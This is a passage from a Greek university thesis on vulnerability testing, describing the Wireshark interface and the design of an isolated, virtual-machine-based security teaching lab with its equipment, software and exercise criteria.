196 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

Εικόνα 4.30: Γραφικό περιβάλλον λειτουργίας του Wireshark

Η διεπαφή του Wireshark περιλαμβάνει πέντε κύρια στοιχεία:

• Τα μενού των εντολών (command menus) είναι συνηθισμένα πτυσσόμενα (pulldown)

μενού που βρίσκονται στο επάνω μέρος του παραθύρου.

• Το παράθυρο καταλόγου πακέτων (packet-listing window) παρουσιάζει μία περίληψη

της μιας γραμμής για κάθε πακέτο που συλλαμβάνεται η οποία περιλαμβάνει τον αριθμό

πακέτου (πρόκειται για αριθμό που απονέμεται από το Wireshark και όχι για έναν αριθμό

πακέτου που περιέχεται στην επικεφαλίδα οποιουδήποτε πρωτοκόλλου), τον χρόνο

σύλληψης του πακέτου, τις διευθύνσεις πηγής και προορισμού του πακέτου, το είδος του

πρωτοκόλλου και πληροφορία σχετική με το πρωτόκολλο η οποία περιέχεται στο πακέτο.

• Το παράθυρο λεπτομερειών επικεφαλίδας πακέτου (packet-header details window)

παρέχει λεπτομέρειες σχετικά με το επιλεγμένο στο παράθυρο packet-listing πακέτο.

• Το παράθυρο περιεχομένων πακέτου (packet-contents window) παρουσιάζει ολόκληρο

το περιεχόμενο ενός συλλαμβανόμενου πλαισίου και σε μορφή ASCII και σε

δεκαεξαδική μορφή.

• Προς το επάνω μέρος της διεπαφής Wireshark βρίσκεται το πεδίο του φίλτρου

παρουσίασης πακέτων (packet display filter field) στο οποίο μπορούμε να εισαχθεί το

όνομα ενός πρωτοκόλλου ή άλλη πληροφορία έτσι ώστε να γίνει φιλτράρισμα της

πληροφορίας που παρουσιάζεται στο παράθυρο packet-listing (και επομένως στα

παράθυρα packet-header και packet-contents).

Για περισσότερες λεπτομέρειες ο αναγνώστης παραπέμπεται στο εγχειρίδιο χρήσης του

εργαλείου.

Page 197: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

197 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

Κεφάλαιο 5 Εργαστήριο Ασφάλειας (Security Laboratory)

5.1 Εισαγωγή

Η αντιμετώπιση των προβλημάτων Ασφάλειας των Πληροφοριακών Συστημάτων

αποτέλεσε αντικείμενο μελέτης από πολλές ερευνητικές ομάδες. Σύντομα διαμορφώθηκε η

κοινή πεποίθηση ότι η Ασφάλεια Πληροφοριακών Συστημάτων πρέπει να ενταχθεί στα

εκπαιδευτικά προγράμματα των Πανεπιστημιακών Ιδρυμάτων, καθώς αποτελεί θεμελιώδη

λίθο των κρίσιμων εθνικών υποδομών62

.

Μέχρι τα τέλη της δεκαετίας του ενενήντα τα Πανεπιστημιακά Ιδρύματα των ΗΠΑ

αντιμετωπίζουν το θέμα της εκπαίδευσης στην ασφάλεια των πληροφοριακών συστημάτων

ανάλογα με τον τομέα στον οποίο ειδικεύονται (βάσεις δεδομένων, κρυπτογραφία, κλπ),

υλοποιώντας αντίστοιχα εργαστηριακά μαθήματα. Χαρακτηριστική είναι η απουσία ενός

ολοκληρωμένου εργαστηριακού προγράμματος το οποίο να προσεγγίζει συνολικά τους

τομείς της ασφάλειας πληροφοριακών συστημάτων (ασφάλεια δικτύων, ασφάλεια

υπολογιστών, ασφάλεια εφαρμογών, ασφάλεια λογισμικού)63,64

.

Η τρομοκρατική επίθεση στις ΗΠΑ το Σεπτέμβριο του 2001, οδηγεί στον

επαναπροσδιορισμό της Ασφάλειας των Πληροφοριακών Συστημάτων και της Προστασίας

των Κρίσιμων Εθνικών Υποδομών. Η ανάγκη για περισσότερη εκπαίδευση στην Ασφάλεια

Πληροφοριακών συστημάτων τίθεται σε πρώτη προτεραιότητα και τα Πανεπιστημιακά

Ιδρύματα χρηματοδοτούνται από κρατικές πηγές για την ανάπτυξη αντίστοιχων

εκπαιδευτικών προγραμμάτων. Ταυτόχρονα, διοργανώνονται συνέδρια με αποκλειστικό

62 Marsh, R. T., “Critical Foundations: Protecting America's Infrastructure,” President's Commission on Critical Infrastructure Protection, October 1997 63 Bishop M., “The State of INFOSEC Education in Academia: Present and Future,” in Proc. Information Systems Security Education National Colloquium, 1997, pp. 19-33 64 Wright M., “The Need For Information Security,” Computer Fraud and Security, 1998, pp. 14-17

Page 198: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

198 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

θέμα την εκπαίδευση στην Ασφάλεια Πληροφορικών Συστημάτων ενώ χρηματοδοτούνται

ερευνητικές ομάδες για την ανάπτυξη ανάλογων εκπαιδευτικών προγραμμάτων.

5.2 Χαρακτηριστικά ενός Εργαστηρίου Ασφάλειας Για τη δημιουργία ενός Εργαστηρίου Ασφάλειας έχουν διατυπωθεί διάφορες προσεγγίσεις

από πολλούς ερευνητές όπως ο Matt Bishop, οι Hill, Carver, Humphries & Pooch, κλπ. Ο

σχεδιασμός του εργαστηρίου εξαρτάται από τη φύση του προγράμματος σπουδών και το

αντικείμενο εκπαίδευσης. Ωστόσο, υπάρχουν κάποιες γενικές αρχές οι οποίες μπορούν να

καθοδηγήσουν τη δημιουργία ενός εργαστηρίου ασφάλειας. Συγκεκριμένα, ένα καλά

σχεδιασμένο εργαστήριο θα πρέπει να διαθέτει τα εξής χαρακτηριστικά65

• Αναδιάρθρωση και ευελιξία: διαφορετικά θέματα και ασκήσεις απαιτούν διαφορετικές

τοπολογίες δικτύου και λειτουργικών συστημάτων και γι’ αυτό πρέπει να είναι εύκολη

και αποδοτική η αναδιάρθρωσή τους.

:

• Ετερογένεια λειτουργικών συστημάτων: η υποδομή πρέπει να υποστηρίζει

διαφορετικά λειτουργικά συστήματα για να ανταποκρίνεται στις απαιτήσεις του

πραγματικού κόσμου.

• Επεκτασιμότητα: Το εργαστήριο θα πρέπει να μπορεί να ανταπεξέλθει στη χρήση του

από πολλούς φοιτητές ταυτόχρονα, οι οποίοι θα έχουν αντικείμενο απασχόλησης, ενώ οι

ομάδες των σπουδαστών δεν πρέπει να γίνονται μεγάλες λόγω της έλλειψης πόρων.

• Οικονομικά αποδοτικές προδιαγραφές: Το κόστος της εγκατάστασης και συντήρησης

του εργαστηρίου πρέπει να είναι πολύ μικρότερο από αυτό που προσομοιώνεται. Για

παράδειγμα, εάν προσομοιώνει ένα μικρομεσαίο δίκτυο μιας επιχείρησης, το κόστος

δημιο υργίας και συντήρησής το υ θα πρέπει να είναι πολύ μικρότερο από αυτό της

επιχείρησης.

• Ευρωστία: Το εργαστήριο πρέπει να είναι δομημένο έτσι ώστε να αντέχει τα σφάλματα

των σπουδαστών. Για παράδειγμα, θα πρέπει να είναι εύκολη η γρήγορη ανάκτηση της

εγκατάστασης και των ρυθμίσεων ενός υπολογιστή στον οποίο ο σπουδαστής εκτέλεσε

ιομορφικό λογισμικό και διαγράφηκαν τα δεδομένα του σκληρού δίσκου.

• Ευκολία στη συντήρηση: Η συντήρηση του εργαστηρίου θα πρέπει να είναι εύκολη έτσι

ώστε συνηθισμένες εργασίες, όπως η δημιουργία αντιγράφων ασφαλείας και η

εγκατάσταση των ενημερώσεων του λογισμικού, να γίνονται εύκολα και

αυτοματοποιημένα, στο βαθμό που αυτό είναι εφικτό.

• Ρεαλιστικά συστήματα: Το εργαστήριο θα πρέπει να παρέχει πρακτική γνώση και

εμπειρία για τους φοιτητές σε ένα περιβάλλο ν δικτύο υ που προσομοιώνει, από άποψη 65 Memon N., Padman V., Frankl P., Naumovich G., “Design and Implementation of an Information Security Laboratory,” Journal of Information Warfare, vol. 2, no. 3, 2003, pp. 60-71.

Page 199: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

199 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

πολυπλοκότητας, ένα δίκτυο που θα μπορούσαν να συναντήσουν στο επιχειρησιακό

περιβάλλον.

• Απομονωμένο: Οι δραστηριότητες στο εργαστήριο δεν πρέπει να επηρεάσουν την

κυκλοφορία του δικτύου στο πανεπιστήμιο. Θα πρέπει να υπάρξει σαφής διαχωρισμός

και απομόνωση του δικτύου του εργαστηρίου από το εξωτερικό δίκτυο

Δεδομένου ότι τα εργαλεία τα οποία χρησιμοποιούνται σε ένα εργαστήριο ασφάλειας

μπορούν να αποβούν επικίνδυνα για την ασφάλεια του δικτύου ή των μηχανημάτων που

χρησιμοποιούνται σε αυτό, θα πρέπει να είναι απομονωμένο από το υπόλοιπο δίκτυο και το

διαδίκτυο. Οι λόγοι που επιβάλλουν την απομόνωση του εργαστηρίου μπορούν να

συνοψιστούν στους εξής66,67

• Πρέπει να διασφαλίζεται ότι εξουσιοδοτημένοι χρήστες μπορούν να προσπελάσουν μόνο

τις πληροφορίες για τις οποίες έχουν εξουσιοδότηση πρόσβασης

:

• Δεν πρέπει να επιτρέπεται στους χρήστες η ακούσια δημοσίευση ευαίσθητων δεδομένων

ή ευπαθειών των συστημάτων

• Οι χρήστες δεν πρέπει να μπορούν να μεταφέρουν από/προς το εργαστήριο ιομορφικό

λογισμικό όπως π.χ. Δούρειους Ίππους. Αυτό επεκτείνεται και στα ανασφαλή

πρωτόκολλα τα οποία μπορεί να χρησιμοποιούνται στο εργαστήριο

• Οι χρήστες του εργαστηρίου πρέπει να αποτραπούν από τη σκόπιμη μεταβίβαση

πληροφορίας στο Διαδίκτυο, καθώς και από την εκτέλεση μιας επίθεσης ενάντια σε έναν

κόμβο του Διαδικτύου (είτε κακόβουλα είτε όχι)

• Το εργαστήριο θα πρέπει να χρησιμοποιείται χωρίς να ανησυχούν οι σπουδαστές για τις

αρνητικές συνέπειες στο δίκτυο και στα μηχανήματα

• Δεν πρέπει να είναι προσπελάσιμο από τους λοιπούς χρήστες του διαδικτύου οι οποίοι

είναι πιθανό να εντοπίσουν τις ευπάθειες των μηχανημάτων που θα χρησιμοποιηθούν για

τις ασκήσεις και να προσπαθήσουν να εξαπολύσουν επιθέσεις σε αυτά.

• Μπορούν να τεθούν περιορισμοί από το διαχειριστή του συστήματος

• Οι εξωτερικοί επιτιθέμενοι δεν έχουν τη δυνατότητα να εκκινήσουν μια πλατφόρμα μέσα

στο εργαστήριο.

• Οι σπουδαστές μπορούν να έχουν δικαιώματα διαχειριστή του δικτύου για τις ασκήσεις

που το απαιτούν

66 Bishop, M. and Heberlein, L. T., “An Isolated Network for Research,” 19th National Information Systems Security Conference, Baltimore, MD, October 22-25, 1996, pp. 349-360. 67 Carver C., Hill J., Humphries J., Pooch U., “Using an Isolated Network Laboratory to Teach Advanced Networks and Security,” ACM SIGCSE Bulletin, vol. 33, no. 1, 2001, pp. 36-40.

Page 200: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

200 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

Για τη δημιουργία ενός απομονωμένου εργαστηρίου η πιο απλή προσέγγιση είναι να υπάρξει

ένα φυσικό ξεχωριστό δίκτυο68

. Στο φυσικό χώρο του εργαστηρίου οι υπολογιστές

συνδέονται μεταξύ τους με τον απαραίτητο δικτυακό εξοπλισμός, χωρίς να υπάρχει

πρόσβαση στο κεντρικό δίκτυο του πανεπιστημίου και στο διαδίκτυο. Τα εργαλεία και οι

εφαρμογές που θα χρησιμοποιηθούν για τις ασκήσεις εκκινούνται μόνο μέσω συσκευών

ανάγνωσης όπως CD ή DVD. Με αυτό τον τρόπο διασφαλίζεται η ακεραιότητα των

δεδο μένων και το υ δικτύο υ καθώς και η πρό σβαση μόνο ν σε αυτούς πο υ έχουν

εξουσιοδότηση για τη χρήση του.

Ωστόσο, υπάρχουν αρκετά μειονεκτήματα σε αυτό το περιβάλλον εργαστηρίου.

Αναλυτικότερα:

• Δεδομένου ότι δεν υπάρχει πρόσβαση στο διαδίκτυο κάθε άσκηση πρέπει να έχει

σχεδιαστεί πολύ καλά εκ των προτέρων

• Δεν παρέχει ευελιξία στην αναδιάρθρωση του

• Η διαχείρισή του είναι χρονοβόρα

• Δεν παρέχει ευκολία στην ανάκαμψη από την καταστροφή

• Έχει υψηλό κόστος

Μια εναλλακτική προσέγγιση στη δημιουργία του εργαστηρίου ασφάλειας με πολλά

πλεονεκτήματα είναι η χρήση εικονικών μηχανών. Τα πλεονεκτήματα που παρέχει αυτός ο

τρόπος μπορούν να συνοψιστούν στα εξής:

• Γίνεται αποτελεσματικότερη αξιοποίηση των φυσικών πόρων του εργαστηρίου αφού

μπορούν να χρησιμοποιηθούν για τη διδασκαλία και άλλων μαθημάτων

• Πολλαπλά περιβάλλοντα μπορούν να δημιουργηθούν, να διαμορφωθούν και να

διανεμηθούν εύκολα και γρήγορα μειώνοντας το διαχειριστικό κόστος

• Είναι εφικτή η πρόσβαση σε εξωτερικούς πόρους με ταυτόχρονη αποτροπή των

επιθέσεων σε αυτούς τους πόρους

• Ασκήσεις που απαιτούν αρκετό χρόνο προετοιμασίας μπορούν να δημιουργηθούν μια

μόνο φορά και στη συνέχεια να διανεμηθούν

• Ασκήσεις πο υ παρεμπο δίζο υν η μια την άλλη μπο ρο ύν να δημιουργηθο ύν για

διαφορετικά εικονικά μηχανήματα

• Το κόστος δημιουργίας του εργαστηρίου είναι μικρό

• Η ανάκαμψη από καταστροφή είναι εύκολη και ανώδυνη αφού απαιτείται μόνο η

αντιγραφή ενός αρχείου στο σύστημα

68 Bulbrook H, “Using Virtual Machines to provide a secure Teaching Lab Environment”, Durham Technical Community College, 2008

Page 201: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

201 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

• Παρέχεται η δυνατότητα ταυτόχρονης εκτέλεσης διαφορετικών εικονικών μηχανών στον

ίδιο φυσικό πόρο (υπολογιστή) με την προϋπόθεση βέβαια της ικανότητας του πόρου

• Μπορούν να δοθούν δικαιώματα διαχειριστή του συστήματος στους σπουδαστές για τις

ασκήσεις που το απαιτούν

Η χρήση εικονικών μηχανών για τη διδασκαλία σε ένα εργαστήριο ασφάλειας είναι αρκετά

διαδεδομένη αν και έχει τον περιορισμό ότι δεν μπορούν να εκτελεστούν σε αυτές όλων των

ειδών οι ασκήσεις. Επιπλέον, τα φυσικά μηχανήματα που τις φιλοξενούν θα πρέπει να

διαθέτουν τέτοια χαρακτηριστικά τα οποία να είναι ικανά να αντέξουν το φόρτο λειτουργίας

τους.

5.3 Ανάπτυξη Εργαστηρίου Ασφάλειας

Στην παρούσα εργασία αναπτύχθηκε ένα εργαστήριο ασφάλειας λαμβάνοντας υπόψη όσα

αναφέρθηκαν στην προηγούμενη ενότητα. Το εργαστήριο απευθύνεται σε προπτυχιακούς

φοιτητές 3ου ή 4ου έτους και θα πραγματοποιείται σε εβδομαδιαία βάση, με απασχόληση 2

διδακτικών ωρών. Οι ασκήσεις του εργαστηρίου αξιοποιούν τις δυνατότητες των εργαλείων

ανοιχτού κώδικα που περιγράφηκαν στο 4ο κεφάλαιο της παρούσας εργασίας και καλύπτουν,

χωρίς όμως να το εξαντλούν, ένα ευρύ φάσμα του τομέα της ασφάλειας πληροφοριακών

συστημάτων.

5.3.1 Σκοπός του εργαστηρίου

Το εργαστήριο δημιουργήθηκε με σκοπό οι σπουδαστές να:

• εμπεδώσουν και να εμβαθύνουν τις θεωρητικές γνώσεις που έχουν αποκτήσει

• αναπτύξουν δεξιότητες και να αποκτήσουν εμπειρία στην αντιμετώπιση περιστατικών

ασφάλειας

• γνωρίσουν τις καλύτερες πρακτικές ασφάλειας

• κατανοήσουν το μέγεθος και την έκταση των προβλημάτων που αντιμετωπίζει η

ασφάλεια πληροφοριακών συστημάτων

• διδαχτούν σύγχρονες τεχνικές ασφάλειας

• επιστήσουν την προσοχή τους σε νομικά θέματα και ηθικά ζητήματα

• αναπτύξουν ομαδικό πνεύμα συνεργασίας

Page 202: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

202 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

5.3.2 Προαπαιτούμενες γνώσεις

Για την παρακολούθηση του εργαστηρίου οι φοιτητές θα πρέπει να έχουν διδαχτεί και να

διαθέτουν βασικές γνώσεις για:

• ασφάλεια υπολογιστών

• δίκτυα και ασφάλεια δικτύων

• κρυπτογραφία

• πολιτική ασφάλειας

• ανάλυση επικινδυνότητας

• λειτουργικά συστήματα

• βάσεις δεδομένων

• προγραμματισμό

5.3.3 Υλικοτεχνική υποδομή

Για τη διεξαγωγή του εργαστηριακού μαθήματος σε μια τάξη μέγιστης χωρητικότητας 20

ατόμων, οι τεχνικές προδιαγραφές του απαιτούμενου εξοπλισμού έχουν ως εξής:

• 10 ηλεκτρονικοί υπολογιστές με τα εξής ελάχιστα χαρακτηριστικά:

o 2,66 GHz (κατά προτίμηση διπλού πυρήνα-dual core)

o 2 GB μνήμη RAM

o 250 GB χωρητικότητα σκληρού δίσκου

o Κάρτα δικτύου

• Μεταγωγείς, δρομολογητές

• Ανάχωμα ασφάλειας (firewall)

• Η Εφαρμογή VMware Workstation

• Τα εργαλεία ανοιχτού κώδικα που περιγράφηκαν στο προηγούμενο κεφάλαιο

Για τη διεξαγωγή των ασκήσεων έχουν δημιουργηθεί τρία εικονικά μηχανήματα:

• Ένα εικονικό μηχάνημα με Linux BackTrack 4, το οποίο είναι μια εξειδικευμένη

πλατφόρμα για τη διενέργεια ελέγχων τρωτότητας, όπου περιλαμβάνονται αρκετά

εργαλεία ανοικτού κώδικα έτοιμα προς χρήση

• Ένα εικονικό μηχάνημα με Windows XP SP2 το οποίο έχει εγκατεστημένα τα εργαλεία

που θα χρησιμοποιηθούν στις ασκήσεις και δεν περιλαμβάνονται στο Linux BackTrack 4.

• Ένα εικονικό μηχάνημα με Windows XP SP2 το οποίο διαθέτει ευπάθειες για την

πραγματοποίηση των ασκήσεων και στο οποίο έχουν εγκατασταθεί:

Page 203: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

203 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

o η εφαρμογή XAMPP69

o η web εφαρμογή Mutillidae

η οποία πραγματοποιεί την αυτόματη εγκατάστασή διαφόρων

ευπαθών εξυπηρετητών (servers) όπως Apache, HTTP, FTP, mail server και MySQL 70

η οποία επίσης διαθέτει διάφορες ευπάθειες

κατάλληλες για τη διενέργεια των ασκήσεων

Ανάλογα με το είδος της άσκησης που πρόκειται να διενεργηθεί εκκινείται η κατάλληλη

εικονική μηχανή στους υπολογιστές του εργαστηρίου. Για να επιτευχθεί η δημιουργία του

απομονωμένου δικτύου θα χρησιμοποιηθεί μια από τις διαθέσιμες εικονικές κάρτες δικτύου

που διαθέτει η εφαρμογή VMware Workstation και θα αποδοθούν διαφορετικές διευθύνσεις

ΙΡ στα εικονικά μηχανήματα από αυτές του πραγματικού δικτύου. Με αυτό τον τρόπο

επιτυγχάνεται η δημιουργία ενός ιδιωτικού εικονικού δικτύου το οποίο είναι απομονωμένο

από φυσικό δίκτυο του εργαστηρίου, χωρίς ταυτόχρονα να υπάρχει πρόσβαση στο

διαδίκτυο. Έτσι αποφεύγονται πιθανές επιθέσεις στα μηχανήματα του εργαστηρίου από

άλλους χρήστες του διαδικτύου και η πρόκληση καταστροφών στα μηχανήματα του

εργαστηρίου ή του υπόλοιπου δικτύου του πανεπιστημιακού ιδρύματος.

Εάν για τις ανάγκες διεξαγωγής μιας άσκησης απαιτείται οι σπουδαστές να ανατρέξουν σε

βιβλιογραφικές πηγές ή να πραγματοποιήσουν έρευνα στο διαδίκτυο μπορούν να

χρησιμοποιήσουν το φυσικό δίκτυο του εργαστηρίου το οποίο μπορεί να διαθέτει πρόσβαση

στο διαδίκτυο χωρίς να υπάρχουν κίνδυνοι πρόκλησης καταστροφής.

Επειδή για κάποια από τα εργαλεία είναι απαραίτητες οι τακτικές ενημερώσεις, ο υπεύθυνος

του εργαστηρίου μπορεί πριν την έναρξη του μαθήματος να συνδέσει τα εικονικά

μηχανήματα στο δίκτυο του εργαστηρίου και να ανακτήσει τις ενημερώσεις από το

διαδίκτυο. Εναλλακτικά, μπορεί να πραγματοποιήσει λήψη των ενημερώσεων στον

προσωπικό του υπολογιστή και να τις μεταφέρει στα εικονικά μηχανήματα με χρήση

αφαιρούμενου δίσκου.

Η προτεινόμενη τοπολογία του δικτύου για τη διεξαγωγή των ασκήσεων φαίνεται στην

επόμενη εικόνα.

69 http://www.apachefriends.org/en/xampp.html 70 http://www.irongeek.com/i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10

Page 204: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

204 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

Εικόνα 5.1: Τοπολογία δικτύου για τη διεξαγωγή των εργαστηριακών ασκήσεων

5.3.4 Εκπαιδευτικό Προσωπικό – Διαχείριση Εργαστηρίου

Η επίβλεψη του εργαστηρίου και η διεξαγωγή των ασκήσεων μπορεί να ανατεθεί σε

διδακτορικούς φοιτητές οι οποίοι, λόγω της ερευνητικής τους δραστηριότητας, γνωρίζουν

τις τελευταίες εξελίξεις στο χώρο της ασφάλειας των πληροφοριακών συστημάτων και κατά

συνέπεια μπορούν να προσαρμόσουν το μάθημα σε αυτές. Επειδή όμως η εκπαίδευση

απαιτεί δεξιότητες προσαρμοστικότητας και μεταδοτικότητας εκ μέρους του διδάσκοντος, ο

καθηγητής του μαθήματος, ο οποίος έχει και τη συνολική εποπτεία του μαθήματος, είναι

αυτός που θα επιλέξει το κατάλληλο άτομο για την διεξαγωγή του μαθήματος.

Ο εισηγητής, πριν την έναρξη του εργαστηριακού μαθήματος, θα πρέπει να έχει

προετοιμάσει τις ασκήσεις που θα πραγματοποιηθούν στο εργαστήριο και να έχει

προετοιμαστεί και ο ίδιος ώστε να είναι σε θέση να απαντήσεις τις ερωτήσεις των

σπουδαστών παραθέτοντας παραδείγματα ή παραπέμποντας στην κατάλληλη βιβλιογραφία.

Για την αποτελεσματικότερη λειτουργία του εργαστηρίου προτείνεται η έγκαιρη ενημέρωση

των σπουδαστών για το περιεχόμενο του εργαστηριακού μαθήματος. Αυτό μπορεί να

επιτευχθεί μέσω της ιστοσελίδας του μαθήματος όπου ο επιβλέπων διδάκτορας μπορεί να

αναρτά την προτεινόμενη βιβλιογραφία, το λογισμικό που θα χρησιμοποιηθεί, τα εγχειρίδια

Page 205: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

205 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

ή οτιδήποτε άλλο κρίνει ότι θα είναι χρήσιμο για την αποδοτικότερη αξιοποίηση του

εργαστηρίου.

Προκειμένου να εξασφαλιστεί η ενεργητική συμμετοχή των σπουδαστών και να

βελτιστοποιηθεί η απόδοση του εργαστηρίου μπορούν να δημιουργηθούν εθελοντικές

ομάδες στο εργαστήριο με σκοπό να βοηθούν στην εγκατάσταση των εργαλείων, στην

παραμετροποίηση τους, να βοηθούν άλλους σπουδαστές του εργαστηρίου που

αντιμετωπίζουν προβλήματα ή και να προτείνουν τύπους ασκήσεων που άπτονται του

γενικότερου ενδιαφέροντος των σπουδαστών. Επιπλέον, θα μπορούσε να δημιουργηθεί και

να λειτουργήσει ένας χώρος ανταλλαγής απόψεων στην σελίδα του μαθήματος.

Τέλος, για τη διεξαγωγή των ασκήσεων προτείνεται ο διαχωρισμός των σπουδαστών σε

ολιγομελής ομάδες 2 – 3 ατόμων. Ο διαχωρισμός αυτός βέβαια, είναι συναρτήσει του

διαθέσιμου εξοπλισμού.

5.3.5 Κριτήρια ανάπτυξη και ταξινόμησης εργαστηριακών ασκήσεων

Οι εργαστηριακές ασκήσεις έχουν σχεδιαστεί για σπουδαστές προπτυχιακού επιπέδου οι

οποίοι διδάσκονται πρώτη φορά θέματα ασφάλειας. Οι προαπαιτούμενες γνώσεις εμπίπτουν

στο γνωστικό πεδίο που ήδη διαθέτουν από προηγούμενα μαθήματα ή από την προσωπική

και επαγγελματική τους εμπειρία. Για την επιπλέον διευκόλυνση τους οι ασκήσεις

περιορίζονται σε ευπάθειες των Windows συστημάτων τα οποία είναι ευρέως

χρησιμοποιούμενα, ενώ ταυτόχρονα, η χρήση του Linux Backtrack 4 επιτρέπει στους

σπουδαστές που δεν έχουν εμπειρία με Linux εφαρμογές να την αποκτήσουν.

Συνοψίζοντας, τα κριτήρια για την ανάπτυξη των εργαστηριακών ασκήσεων ήταν τα εξής:

• να καλύπτουν ένα ευρύ φάσμα των προβλημάτων ασφάλειας των πληροφοριακών

συστημάτων

• να αξιοποιούν στο μέγιστο δυνατό βαθμό τις δυνατότητες των εργαλείων

• να είναι αυξανόμενης δυσκολίας

• να διευρύνουν τις θεωρητικές γνώσεις των σπουδαστών σε πρακτικά ζητήματα

• να διευκολύνουν την απόκτηση πρακτικής εμπειρίας σε ζητήματα ασφάλειας

πληροφοριακών συστημάτων

• να βρίσκονται σε αντιστοιχία με τις απαιτήσεις της αγοράς εργασίας

Page 206: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

206 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

